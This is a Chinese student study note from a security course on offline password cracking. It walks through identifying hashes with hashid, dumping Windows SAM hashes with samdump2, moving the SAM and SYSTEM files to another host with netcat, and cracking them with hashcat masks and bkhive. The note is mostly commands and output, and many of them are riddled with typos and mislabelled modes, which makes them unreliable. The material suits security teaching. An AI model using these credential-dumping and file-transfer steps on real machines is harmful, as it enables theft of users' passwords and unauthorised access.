【安全牛学习笔记】离线密码破解、离线密码破解-Hashcat

离线密码破解                                 优势                                             - 离线不会触发密码锁定机制                   - 不会产生大量登录失败日志引起管理员注意 HASH识别工具                                     - hash-identifier                            - Hashid                                     - 可能识别错误或无法识别

通过使用hashid或者Hash-Identifier这种工具来识别哈希类型

工具下载地址：

git clone https://github.com/psypanda/hashid.git

git clone https://github.com/Miserlou/Hash-Identifier.git

root@k:~/Hash-Identifier# ls

Hash_ID.py  README.md

root@k:~/Hash-Identifier# chmod u+x Hash_ID.py   //赋予执行权限

root@k:~/Hash-Identifier# python Hash_ID.py    //打开Hashid

-------------------------------------------------------------------------

 HASH: 5f4dcc3b5aa765d61d8327deb882cf99      //md5加密

Possible Hashs:

[+] MD5

[+] Domain Cashed Credentials . MD4(MD5($pass)).(strtolower($username)))

Least Possible Hashs:

[+]  RAdmin v2.x

[+]  NTLM

[+]  MD4

[+]  MD2

[+]  MD5(HMAC)

[+]  MD4(HMAC)

[+]  MD2(HMAC)

[+]  MD5(HMAC(Wordpress))

[+]  Haval-128

[+]  Haval-128(HMAC)

[+]  RipeMD-128

[+]  RipeMD-128(HMAC)

[+]  SNEFRU-128

[+]  SNEFRU-128(HMAC)

[+]  Tiger-128

[+]  Tiger-128(HMAC)

[+]  md5($pass.$salt)

[+]  md5($salt.$pass)

[+]  md5($salt.$pass.$salt)

[+]  md5($salt.$pass.$username)

[+]  md5($salt.md5($pass))

[+]  md5($salt.md5($pass))

[+]  md5($salt.md5($pass.$salt))

[+]  md5($salt.md5($pass.$salt))

[+]  md5($salt.md5($salt.$pass))

[+]  md5($salt.md5(md5($pass).$salt))

[+]  md5($username.0.$pass)

[+]  md5($username.LF.$pass)

[+]  md5($username.md5($pass).$salt)

[+]  md5(md5($pass))

[+]  md5(md5($pass).$salt)

[+]  md5(md5($pass).md5($salt))

[+]  md5(md5($salt).$pass)

[+]  md5(md5($salt).md5($pass))

[+]  md5(md5($username.$pass).$salt)

[+]  md5(md5(md5($pass)))

[+]  md5(md5(md5(md5($pass))))

[+]  md5(md5(md5(md5(md5($pass)))))

[+]  md5(sha1($pass))

[+]  md5(sha1(md5($pass)))

[+]  md5(sha1(md5(sha1($pass))))

[+]  md5(strtoupper(md5($pass)))

   -------------------------------------------------------------------------

HASH: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8    //shal加密

Possible Hashs:

[+]  SHA-1

[+]  MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:

[+]  Tiger-160

[+]  Haval-160

[+]  RipeMD-160

[+]  SHA-1(HMAC)

[+]  Tiger-160(HMAC)

[+]  RipeMD-160(HMAC)

[+]  Haval-160(HMAC)

[+]  SHA-1(MaNGOS)

[+]  SHA-1(MaNGOS2)

[+]  sha1($pass.$salt)

[+]  sha1($salt.$pass)

[+]  sha1($salt.md5($pass))

[+]  sha1($salt.md5($pass).$salt)

[+]  sha1($salt.sha1($pass))

[+]  sha1($salt.sha1($salt.sha1($pass)))

[+]  sha1($username.$pass)

[+]  sha1($username.$pass.$salt)

[+]  sha1(md5($pass))

[+]  sha1(md5($pass).$salt)

[+]  sha1(md5(sha1($pass)))

[+]  sha1(sha1($pass))

[+]  sha1(sha1($pass).$salt)

[+]  sha1(sha1($pass).substr($pass,0,3))

[+]  sha1(sha1($salt.$pass))

[+]  sha1(sha1(sha1($pass)))

[+]  sha1(strtolower($username).$pass)

   -------------------------------------------------------------------------

root@K:~# hashid b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86

[+] SHA-512

[+] Whirlpool

[+] Salsa10

[+] Salsa20

[+] SHA3-512

[+] SKein-512

[+] Skein-1024(512)

oot@k:~/hashid# hashid 5f4dcc3b5aa765d61d8327deb882cf99

Analyzing '5f4dcc3b5aa765d61d8327deb882cf99'

[+] MD2 

[+] MD5 

[+] MD4 

[+] Double MD5 

[+] LM 

[+] RIPEMD-128 

[+] Haval-128 

[+] Tiger-128 

[+] Skein-256(128) 

[+] Skein-512(128) 

[+] Lotus Notes/Domino 5 

[+] Skype 

[+] Snefru-128 

[+] NTLM 

[+] Domain Cached Credentials 

[+] Domain Cached Credentials 2 

[+] DNSSEC(NSEC3) 

[+] RAdmin v2.x 

离线密码破解                                   Windows HASH获取工具                               - 利用漏洞: Pwdump、fgdump、mimikatz、wce     - 物理接触: samdump2                           - Kali ISO 启动虚拟机                          - mount /dev/sdal /mnt                         - cd /mnt/Windows/System32/config              - samdump2 SYSTEM SAM -o sam.hash              - 利用nc传输HASH

win7 ip地址： 192.168.1.121

C:\net user w7 1234

命令完成成功！

root@kali:~# fdisk -l    //查看分区

Disk /dev/sha: 80 GiB, 85899345920 bytes, 16772160 sectors

UNits: sectors of 1 * 512 = 512 bytes

Sector size (logical/physical): 512 bytes /512 bytes

I/O size (minimum/optimal): 512 bytes / 512 bytes

Disklablel type: dos

Disk identifier: 0x6852cbef

Device    Boot  Start      End   Sectors  Size ID Type

/dev/sdal *      2048   206847    204800  100M  7 HPFS/NTFS/exFAX

/dev/sda2      206848 16770111 167563264 79.9G  7 HPFS/NTFS/exFAX

Disk /dev/loop0: 2.4GB, 2556620800 bytes, 4993400 sectors

UNits: sectors of 1 * 512 = 512 bytes

Sector size (logical/physical): 512 bytes /512 bytes

I/O size (minimum/optimal): 512 bytes / 512 bytes

root@kali:~# mount /dev/sha2 /mnt/

root@kali:~# mount /dev/sha2 /media/

root@kali:~# cd /media/

root@kali:/media# ls

Boot  bootmgr  BOOTSECT.BAK  grldr  $RECUELE.BIN  System volume Information

root@kali:/media# cd /mnt/

root@kali:/mnt# ls

Documents and Settings

pagefiles.sys

PerfLogs

root@kali:/mnt# cd /mnt/Windows/System32/config

root@kali:/mnt/Windows/System32/config# ls

root@kali:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash

root@kali:/mnt/Windows/System32/config# cat sam.hash

*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

w7:1000:aad3b435b5140eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::

root@K:~# nc -nvlp 3333

listeing on [any] 333...

connect to [192.168.1.117] from (UNKNOWN) [192.168.1.121] 56580

7ce21f17c0aee7fb9ceba532d0546ad6

                ↑

                │利用nc监听传给它

                │

root@kali:/mnt/Windows/System32/config# nc 192.168.1.117 333

7ce21f17c0aee7fb9ceba532d0546ad6

离线密码破解-----Hashcat                                       开源多线程密码破解工具                                         支持80多种加密算法破解                                         基于CPU的计算能力破解                 六种模式                                   - 0 Straight: 字典破解                                         - 1 Combination: 将字典中密码进行组合（1 2 > 11 22 12 21）     - 2 Toggle case: 尝试字典中所有密码的大小写字母组合            - 3 Brute force: 指定字符集（或全部字符集）所有组合            - 4 Permutation: 字典中密码的全部字符置换组合（12 21）         - 5 Table-lookup: 程序为字典中所有密码自动生成掩码

GPU破解神器Hashcat使用简介

ccSec · 2013/09/30 20:13

0x00 背景

目前GPU的速度越来越快，使用GPU超强的运算速度进行暴力密码破解也大大提高了成功率，曾经看到老外用26块显卡组成的分布式破解神器让我羡慕不已。要说目前最好的GPU破解HASH的软件，非HashCat莫属了。下面我就为大家具体介绍一下HashCat系列软件。

0x01 所需硬件及系统平台

HashCat系列软件在硬件上支持使用CPU、NVIDIA GPU、ATI GPU来进行密码破解。在操作系统上支持Windows、Linux平台，并且需要安装官方指定版本的显卡驱动程序，如果驱动程序版本不对，可能导致程序无法运行。

如果要搭建多GPU破解平台的话，最好是使用Linux系统来运行HashCat系列软件，因为在windows下，系统最多只能识别4张显卡。并且，Linux下的VisualCL技术（关于如何搭建VisualCL环境，请参考官方文档http://hashcat.net/wiki/doku.php?id=vcl_cluster_howto），可以轻松的将几台机器连接起来，进行分布式破解作业。 在破解速度上，ATI GPU破解速度最快，使用单张HD7970破解MD5可达到9000M/s的速度，其次为NVIDIA显卡，同等级显卡GTX690破解速度大约为ATI显卡的三分之一，速度最慢的是使用CPU进行破解。

0x02 HashCat软件简介

HashCat主要分为三个版本：Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是：HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH，并且支持的算法高达77种。oclHashcat-lite只支持使用GPU对单个HASH进行破解，支持的HASH种类仅有32种，但是对算法进行了优化，可以达到GPU破解的最高速度。如果只有单个密文进行破解的话，推荐使用oclHashCat-lite。

目前最新的软件版本为HashCat v0.46、oclHashcat-plus v0.15、oclHashcat-lite v0.15。但是经过一段时间的测试，发现有时候版本越高，速度越慢。所以推荐在使用没有问题的情况下，无需升级到最新版本。根据测试，oclHashcat-lite v0.10的运算速度比v0.15的运算速度快20%，所以单个密文破解还是推荐使用oclHashcat-lite v0.10。

root@k:~# hashcat -h

hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]

=======

Options

=======

* General:

  -m,  --hash-type=NUM               Hash-type, see references below

  -a,  --attack-mode=NUM             Attack-mode, see references below

  -V,  --version                     Print version

  -h,  --help                        Print help

       --quiet                       Suppress output

* Benchmark:

  -b,  --benchmark                   Run benchmark

* Misc:

       --hex-salt                    Assume salt is given in hex

       --hex-charset                 Assume charset is given in hex

       --runtime=NUM                 Abort session after NUM seconds of runtime

       --status                      Enable automatic update of the status-screen

       --status-timer=NUM            Seconds between status-screen update

       --status-automat              Display the status view in a machine readable format

* Files:

  -o,  --outfile=FILE                Define outfile for recovered hash

       --outfile-format=NUM          Define outfile-format for recovered hash, see references below

       --outfile-autohex-disable     Disable the use of $HEX[] in output plains

  -p,  --separator=CHAR              Define separator char for hashlists/outfile

       --show                        Show cracked passwords only (see --username)

       --left                        Show uncracked passwords only (see --username)

       --username                    Enable ignoring of usernames in hashfile (Recommended: also use --show)

       --remove                      Enable remove of hash once it is cracked

       --stdout                      Stdout mode

       --potfile-disable             Do not write potfile

       --debug-mode=NUM              Defines the debug mode (hybrid only by using rules), see references below

       --debug-file=FILE             Output file for debugging rules (see --debug-mode)

  -e,  --salt-file=FILE              Salts-file for unsalted hashlists

* Resources:

  -c,  --segment-size=NUM            Size in MB to cache from the wordfile

  -n,  --threads=NUM                 Number of threads

  -s,  --words-skip=NUM              Skip number of words (for resume)

  -l,  --words-limit=NUM             Limit number of words (for distributed)

* Rules:

  -r,  --rules-file=FILE             Rules-file use: -r 1.rule

  -g,  --generate-rules=NUM          Generate NUM random rules

       --generate-rules-func-min=NUM Force NUM functions per random rule min

       --generate-rules-func-max=NUM Force NUM functions per random rule max

       --generate-rules-seed=NUM     Force RNG seed to NUM

* Custom charsets:

  -1,  --custom-charset1=CS          User-defined charsets

  -2,  --custom-charset2=CS          Example:

  -3,  --custom-charset3=CS          --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef

  -4,  --custom-charset4=CS          -2 mycharset.hcchr : sets charset ?2 to chars contained in file

* Toggle-Case attack-mode specific:

       --toggle-min=NUM              Number of alphas in dictionary minimum

       --toggle-max=NUM              Number of alphas in dictionary maximum

* Mask-attack attack-mode specific:

       --increment                   Enable increment mode

       --increment-min=NUM           Start incrementing at NUM

       --increment-max=NUM           Stop incrementing at NUM

* Permutation attack-mode specific:

       --perm-min=NUM                Filter words shorter than NUM

       --perm-max=NUM                Filter words larger than NUM

* Table-Lookup attack-mode specific:

  -t,  --table-file=FILE             Table file

       --table-min=NUM               Number of chars in dictionary minimum

       --table-max=NUM               Number of chars in dictionary maximum

* Prince attack-mode specific:

       --pw-min=NUM                  Print candidate if length is greater than NUM

       --pw-max=NUM                  Print candidate if length is smaller than NUM

       --elem-cnt-min=NUM            Minimum number of elements per chain

       --elem-cnt-max=NUM            Maximum number of elements per chain

       --wl-dist-len                 Calculate output length distribution from wordlist

       --wl-max=NUM                  Load only NUM words from input wordlist or use 0 to disable

       --case-permute                For each word in the wordlist that begins with a letter

                                     generate a word with the opposite case of the first letter

==========

References

==========

* Outfile formats:

    1 = hash[:salt]

    2 = plain

    3 = hash[:salt]:plain

    4 = hex_plain

    5 = hash[:salt]:hex_plain

    6 = plain:hex_plain

    7 = hash[:salt]:plain:hex_plain

    8 = crackpos

    9 = hash[:salt]:crackpos

   10 = plain:crackpos

   11 = hash[:salt]:plain:crackpos

   12 = hex_plain:crackpos

   13 = hash[:salt]:hex_plain:crackpos

   14 = plain:hex_plain:crackpos

   15 = hash[:salt]:plain:hex_plain:crackpos

* Debug mode output formats (for hybrid mode only, by using rules):

    1 = save finding rule

    2 = save original word

    3 = save original word and finding rule

    4 = save original word, finding rule and modified plain

* Built-in charsets:

   ?l = abcdefghijklmnopqrstuvwxyz

   ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ

   ?d = 0123456789

   ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

   ?a = ?l?u?d?s

   ?b = 0x00 - 0xff

* Attack modes:

    0 = Straight

    1 = Combination

    2 = Toggle-Case

    3 = Brute-force

    4 = Permutation

    5 = Table-Lookup

    8 = Prince

* Hash types:

     0 = MD5

    10 = md5($pass.$salt)

    20 = md5($salt.$pass)

    30 = md5(unicode($pass).$salt)

    40 = md5($salt.unicode($pass))

    50 = HMAC-MD5 (key = $pass)

    60 = HMAC-MD5 (key = $salt)

   100 = SHA1

   110 = sha1($pass.$salt)

   120 = sha1($salt.$pass)

   130 = sha1(unicode($pass).$salt)

   140 = sha1($salt.unicode($pass))

   150 = HMAC-SHA1 (key = $pass)

   160 = HMAC-SHA1 (key = $salt)

   200 = MySQL323

   300 = MySQL4.1/MySQL5

   400 = phpass, MD5(Wordpress), MD5(phpBB3), MD5(Joomla)

   500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5

   900 = MD4

  1000 = NTLM

  1100 = Domain Cached Credentials (DCC), MS Cache

  1400 = SHA256

  1410 = sha256($pass.$salt)

  1420 = sha256($salt.$pass)

  1430 = sha256(unicode($pass).$salt)

  1431 = base64(sha256(unicode($pass)))

  1440 = sha256($salt.unicode($pass))

  1450 = HMAC-SHA256 (key = $pass)

  1460 = HMAC-SHA256 (key = $salt)

  1600 = md5apr1, MD5(APR), Apache MD5

  1700 = SHA512

  1710 = sha512($pass.$salt)

  1720 = sha512($salt.$pass)

  1730 = sha512(unicode($pass).$salt)

  1740 = sha512($salt.unicode($pass))

  1750 = HMAC-SHA512 (key = $pass)

  1760 = HMAC-SHA512 (key = $salt)

  1800 = SHA-512(Unix)

  2400 = Cisco-PIX MD5

  2410 = Cisco-ASA MD5

  2500 = WPA/WPA2

  2600 = Double MD5

  3200 = bcrypt, Blowfish(OpenBSD)

  3300 = MD5(Sun)

  3500 = md5(md5(md5($pass)))

  3610 = md5(md5($salt).$pass)

  3710 = md5($salt.md5($pass))

  3720 = md5($pass.md5($salt))

  3800 = md5($salt.$pass.$salt)

  3910 = md5(md5($pass).md5($salt))

  4010 = md5($salt.md5($salt.$pass))

  4110 = md5($salt.md5($pass.$salt))

  4210 = md5($username.0.$pass)

  4300 = md5(strtoupper(md5($pass)))

  4400 = md5(sha1($pass))

  4500 = Double SHA1

  4600 = sha1(sha1(sha1($pass)))

  4700 = sha1(md5($pass))

  4800 = MD5(Chap), iSCSI CHAP authentication

  4900 = sha1($salt.$pass.$salt)

  5000 = SHA-3(Keccak)

  5100 = Half MD5

  5200 = Password Safe SHA-256

  5300 = IKE-PSK MD5

  5400 = IKE-PSK SHA1

  5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS

  5600 = NetNTLMv2

  5700 = Cisco-IOS SHA256

  5800 = Android PIN

  6300 = AIX {smd5}

  6400 = AIX {ssha256}

  6500 = AIX {ssha512}

  6700 = AIX {ssha1}

  6900 = GOST, GOST R 34.11-94

  7000 = Fortigate (FortiOS)

  7100 = OS X v10.8+

  7200 = GRUB 2

  7300 = IPMI2 RAKP HMAC-SHA1

  7400 = sha256crypt, SHA256(Unix)

  7900 = Drupal7

  8400 = WBB3, Woltlab Burning Board 3

  8900 = scrypt

  9200 = Cisco $8$

  9300 = Cisco $9$

  9800 = Radmin2

 10000 = Django (PBKDF2-SHA256)

 10200 = Cram MD5

 10300 = SAP CODVN H (PWDSALTEDHASH) iSSHA-1

 11000 = PrestaShop

 11100 = PostgreSQL Challenge-Response Authentication (MD5)

 11200 = MySQL Challenge-Response Authentication (SHA1)

 11400 = SIP digest authentication (MD5)

 99999 = Plaintext

* Specific hash types:

   11 = Joomla < 2.5.18

   12 = PostgreSQL

   21 = osCommerce, xt:Commerce

   23 = Skype

  101 = nsldap, SHA-1(Base64), Netscape LDAP SHA

  111 = nsldaps, SSHA-1(Base64), Netscape LDAP SSHA

  112 = Oracle S: Type (Oracle 11+)

  121 = SMF > v1.1

  122 = OS X v10.4, v10.5, v10.6

  123 = EPi

  124 = Django (SHA-1)

  131 = MSSQL(2000)

  132 = MSSQL(2005)

  133 = PeopleSoft

  141 = EPiServer 6.x < v4

 1421 = hMailServer

 1441 = EPiServer 6.x > v4

 1711 = SSHA-512(Base64), LDAP {SSHA512}

 1722 = OS X v10.7

 1731 = MSSQL(2012 & 2014)

 2611 = vBulletin < v3.8.5

 2612 = PHPS

 2711 = vBulletin > v3.8.5

 2811 = IPB2+, MyBB1.2+

 3711 = Mediawiki B type

 3721 = WebEdition CMS

 7600 = Redmine Project Management Web App

root@k:~# echo 7ce21f17c0aee7fb9ceba532d0546ad6 >sam.hash

root@k:~# hachcat -m 100 sam.hash pass.lst

离线密码破解-----Hashcat                         命令                                                        - hashcat -b                                        - hashcat -m 100 hash.dump pass.lst          - hashcat -m 0 hash.txt -a 3 ?|?|?|?|?|?|?|?|?d?d                        - 结果: hashcat.pot                                                      - hashcat -m 100 -a 3 sam.hash -i --increment-min 6 --increment-max       8 ?|?|?|?|?|?|?|?|                              - ?| = abcdefghijklmnopqrstuvwxyz                 - ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ                  - ?d = 0123456789                                       - ?s = !"#$%&'()*+,-./:;<=>?@[\]^-`{|}~                - ?a = ?|?u?d?s                                         - ?b = 0x00 - 0xff

root@k:~# hashcat -b

Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Device...........: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz

Instruction set..: x86_64

Number of threads: 1

Hash type: MD4

Speed/sec: 15.88M words

Hash type: MD5

Speed/sec: 12.96M words

Hash type: SHA1

Speed/sec: 9.28M words

Hash type: SHA256

Speed/sec: 4.65M words

Hash type: SHA512

Speed/sec: 1.94M words

Hash type: SHA-3(Keccak)

Speed/sec: 2.15M words

Hash type: GOST R 34.11-94

Speed/sec: 946.71k words

Hash type: SHA-1(Base64), nsldap, Netscape LDAP SHA

Speed/sec: 8.58M words

Hash type: SSHA-1(Base64), nsldaps, Netscape LDAP SSHA

Speed/sec: 8.21M words

Hash type: md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5

Speed/sec: 13.21k words

Hash type: sha256crypt, SHA256(Unix)

Speed/sec: 602 words

Hash type: sha512crypt, SHA512(Unix)

Speed/sec: 382 words

Hash type: bcrypt, Blowfish(OpenBSD)

Speed/sec: 818 words

Hash type: NTLM

Speed/sec: 14.27M words

Hash type: Domain Cached Credentials (DCC), MS Cache

Speed/sec: 8.25M words

Hash type: NetNTLMv1-VANILLA / NetNTLMv1+ESS

Speed/sec: 13.82M words

Hash type: NetNTLMv2

Speed/sec: 2.09M words

root@k:~# hashcat -m 0 hash.txt -a 3 ?d?d?d?d

nitializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)

Activating quick-digest mode for single hash

7ce21f17c0aee7fb9ceba532d0546ad6:1234

All hashed have been recovered

Input.Mode: Mask (?d?d?d?d) [4]

Index.....: O/I (segment), 1000 (words), 0 (bytes)

Recovered.: 1/1 hashes, 1/1 salts

Speed sec.: -plains, 9.31k  words

Progress..: 9324/10000 (93.24%)

Running...: 00:00:00:01

Estimated.: --:--:--:--:

Started Fri Apr 22 00:31:47 2016

Stopped Fri Apr 22 00:31:47 2016

root@k:~# hashcat -m 100 -a 3 sam.hash -i --increment-min 1 --increment-max 5 ?d

Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)

Activating quick-digest mode for single hash

[s]tatus [p]ause [c]esume [b]ypas [q]uit =>

Input.Mode: Mask (?d) [1]

Index.....: O/I (segment), 10 (words), 0 (bytes)

Recovered.: O/I hashes, O/I salts

Speed sec.: -plains, - words

Progress..: 10/10 (100.00%)

Running...: --:--:--:--:

Estimated.: --:--:--:--:

[s]status [p]uase [r]esume [b]ypass [q]uit => '

Started Fri Apr 22 00:31:47 2016

Stopped Fri Apr 22 00:31:47 2016

离线密码破解                                    Syskey工具                                                   - 使用Bootkey利用RC4算法加密SAM数据库                                    - Bootkey保存于SYSTEM文件中                                              - Bkhive                                                                       从SYSTEM文件章提取bootkey                                                Kali 2.0抛弃了bkhive                                                     编译安装: http://http.us.debian.org/debian/pool/main/b/bkhive/           bkhive SYSTEM key                                                samdump2 SAM key （版本已更新，不再支持此功能）                    - 建议使用Kali 1.x

root@k:~#  mount /dev/sha2 /mnt/

root@K:/mnt# cd /mnt/Windows/System32/config

root@k:/mnt/Windows/System32/config# ls

root@k:/mnt/Windows/System32/config# samdump2 SYSTEM SAM -o sam.hash

root@k:/mnt/Windows/System32/config# cat sam.hash

*disbaled* Administrator:500:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

*disbaled* Guest:501:aad3b435b5140eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

w7:1000:aad3b435b5140eeaad3b435b51404ee:91d0a3767644eea90922f597bde98aae::

root@k:~# hash-identifier

-------------------------------------------------------------------------

 HASH: 91d0a3767644eea90922f597bde98aae

Possible Hashs:

[+]  MD5

[+]  Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:

[+]  RAdmin v2.x

[+]  NTLM

[+]  MD4

[+]  MD2

[+]  MD5(HMAC)

[+]  MD4(HMAC)

[+]  MD2(HMAC)

[+]  MD5(HMAC(Wordpress))

[+]  Haval-128

[+]  Haval-128(HMAC)

[+]  RipeMD-128

[+]  RipeMD-128(HMAC)

[+]  SNEFRU-128

[+]  SNEFRU-128(HMAC)

[+]  Tiger-128

[+]  Tiger-128(HMAC)

[+]  md5($pass.$salt)

[+]  md5($salt.$pass)

[+]  md5($salt.$pass.$salt)

[+]  md5($salt.$pass.$username)

[+]  md5($salt.md5($pass))

[+]  md5($salt.md5($pass))

[+]  md5($salt.md5($pass.$salt))

[+]  md5($salt.md5($pass.$salt))

[+]  md5($salt.md5($salt.$pass))

[+]  md5($salt.md5(md5($pass).$salt))

[+]  md5($username.0.$pass)

[+]  md5($username.LF.$pass)

[+]  md5($username.md5($pass).$salt)

[+]  md5(md5($pass))

[+]  md5(md5($pass).$salt)

[+]  md5(md5($pass).md5($salt))

[+]  md5(md5($salt).$pass)

[+]  md5(md5($salt).md5($pass))

[+]  md5(md5($username.$pass).$salt)

[+]  md5(md5(md5($pass)))

[+]  md5(md5(md5(md5($pass))))

[+]  md5(md5(md5(md5(md5($pass)))))

[+]  md5(sha1($pass))

[+]  md5(sha1(md5($pass)))

[+]  md5(sha1(md5(sha1($pass))))

[+]  md5(strtoupper(md5($pass)))

   -------------------------------------------------------------------------

 HASH: ^CTraceback (most recent call last):

  File "/usr/bin/hash-identifier", line 556, in

    hash = raw_input(" HASH: ")

KeyboardInterrupt

root@k:~# echo 91d0a3767644eea90922f597bde98aae > sam1.hash

root@k:~# hashcat -m 1000 sam1.hash pass.lst

Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)

Activating quick-digest mode for single hash

[s]tatus [p]ause [c]esume [b]ypas [q]uit =>

Input.Mode: Mask (pass.lst)

Index.....: O/I (segment),499 (words), 639632 (bytes)

Recovered.: 0/1 hashes, 0/1 salts

Speed sec.: - plains, - words

Progress..: 4999/4999 (93.24%)

Running...: --:--:--:--:

Estimated.: --:--:--:--:

Started Fri Apr 22 00:31:47 2016

Stopped Fri Apr 22 00:31:47 2016

root@k:~# hashcat -m 1000 -a 3 sam1.hash -i  --increment-min 4 --increment-max 6 ?a?a?a?a?a?a

Initializing hashcat v2.00 with 1 threads and 32mb segment-size...

Added hash from file sam.hash: 1 (1 salts)

Activating quick-digest mode for single hash

[s]tatus [p]ause [c]esume [b]ypas [q]uit =>

Input.Mode: Mask (a?a?a?a?) [4]

Index.....: O/I (segment),499 (words), 639632 (bytes)

Recovered.: 0/1 hashes, 0/1 salts

Speed sec.: 9.43M plains, 9.43M words

Progress..: 81450625/81450625 (100.0%)

Running...: 00:00:00:09

Estimated.: --:--:--:--:

......

Started Fri Apr 22 00:31:47 2016

Stopped Fri Apr 22 00:31:47 2016

root@k:~/Downloads# tar zxvf bkhive_1.1.1.orig.tar.gz

bkhive-1.1.1/

bkhive-1.1.1/Makefile

bkhive-1.1.1/README

bkhive-1.1.1/bkhive.1

bkhive-1.1.1/hive.h

bkhive-1.1.1/bkhive.c

bkhive-1.1.1/AUTHORS

bkhive-1.1.1/ChangeLog

bkhive-1.1.1/COPYING

bkhive-1.1.1/Makefile.win32

bkhive-1.1.1/hive.c

root@k:~/Downloads# cd bkhive-1.1.1/

root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl

libssl1.0.2       libssl-dev        libssl-ocaml

libssl1.0.2-dbg   libssl-doc        libssl-ocaml-dev

root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev

root@k:~/Downloads/bkhive-1.1.1# make

/usr/bin/gcc -c    -o bkhive.o bkhive.c

/usr/bin/gcc -c    -o hive.o hive.c

/usr/bin/gcc   -o bkhive hive.o bkhive.o

###############################################################

Bkhive 1.0.0 : extract Syskey bootkey from the system hive file

Copyright (C) 2004-2005 Nicola Cuomo

Distributed under terms of GNU General Public License version 2

###############################################################

root@k:~/Downloads/bkhive-1.1.1# make install

###############################################################

Bkhive 1.0.0 : extract Syskey bootkey from the system hive file

Copyright (C) 2004-2005 Nicola Cuomo

Distributed under terms of GNU General Public License version 2

###############################################################

Cresting directories...

/usr/bin/install -d -m 755 -o root -g root /usr/local/bin

/usr/bin/install -d -m 755 -o root -g root /usr/local/share/man.man1

Copying binary...

/usr/bin/install bkhive -m 755 -o root -g root /usr/local/bin

Installing man page...

/usr/bin/install bkhive.1 -m 644 -o root -g root /usr/local/share/man/man1

root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev

Reading package lists... Done

Building dependency tree

Reading state informatiion... Done

libssl-dev is already the newest version (1.0.2g-1).

You might want to run 'apt-get -f install' to correct thest:

The following packages have unmet dependencies:

  samdump2 : Depends: libssl1.0.0 (>= 1.0.0) but it is not installable

             Recommends: bkhive but it is not going to be insalled

E: Unment dependencies. Try 'apt-get -f install' with no packages (or specify a solution).

root@k:~/Downloads/bkhive-1.1.1# apt-get -f install

Reading package lists... Done

Building dependency tree

Reading state informatiion... Done

Correcting dependencies... Done

The following additional package will be installed:

  samdump2

The following packages will be upgraded:

  samdump2

1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

1 not fully installed or removed.

Need to get 0 B/16.6 kb of archives.

After this operation, 2,048 B of additional disk space will be used.

Do you want to continue? [Y/n]

Reading changelogs... Done

(Reading database... 418766 files and directories currently installed.)

Preparing to unpack .../samdump2_3.0.0-3+b1_amd64.deb ...

Unpacking samdump2 (3.0.0-3+bl) over (1.1.1-1.1) ...

Processing triggers for man-db (2.7-5.1)...

Setting up samdump2 (3.0.0-3+b1) ...

root@k:~/Downloads/bkhive-1.1.1# apt-get purge samdump2        //卸载samdump2

Reading package lists... Done

Building dependency tree

Reading state informatiion... Done

The following additional package will be installed:

  samdump2*

1 upgraded, 0 newly installed, 1 to remove and 0 not upgraded.

After this operation, 43.0 kb disk space will be freed.

Do you want to continue? [Y/n]

(Reading database... 418766 files and directories currently installed.)

Removin samdump2 (3.0.0-3+b1)

Processing triggers for man-db (2.7-5.1)..

root@k:~/Downloads/bkhive-1.1.1# apt-get install libssl-dev

Reading package list... Done

Building dependency tree

Reading state information... Done

libssl-dev is already the newest version (1.0.2g-1).

0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

root@k:~/Downloads/bkhive-1.1.1# bkhive

bkhive 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author : [email protected]

Usage:

bkhive systemhive keyfile

root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SYSTEM

root@kali:~# nc 192.168.1.117 333 < SYSTEM -q 1

root@k:~/Downloads/bkhive-1.1.1# nc -nvlp 333 > SAM

root@kali:~# nc 192.168.1.117 333 < SAM -q 1

root@k:~/Downloads/bkhive-1.1.1# bkhive SYSTEM bkry

bkhive 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author : [email protected]

Root Key : CMI-CreateHie{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}

Default ControlSet: 001

Bootkey: 7ccc5d2742c91350cadc092c20cb5e8f

root@k:~/Downloads/bkhive-1.1.1# cat bk

bkhive     bkhive.1  bkhive.c  bkhive.o  bkry

root@k:~/Downloads/bkhive-1.1.1# cat bkry

root@k:~/Downloads/bkhive-1.1.1# mv bkry key

root@k:~/Downloads/bkhive-1.1.1# apt-get install samdump2

root@k:~/Downloads/bkhive-1.1.1# samdump2 SAM key

该笔记为安全牛课堂学员笔记，想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证？

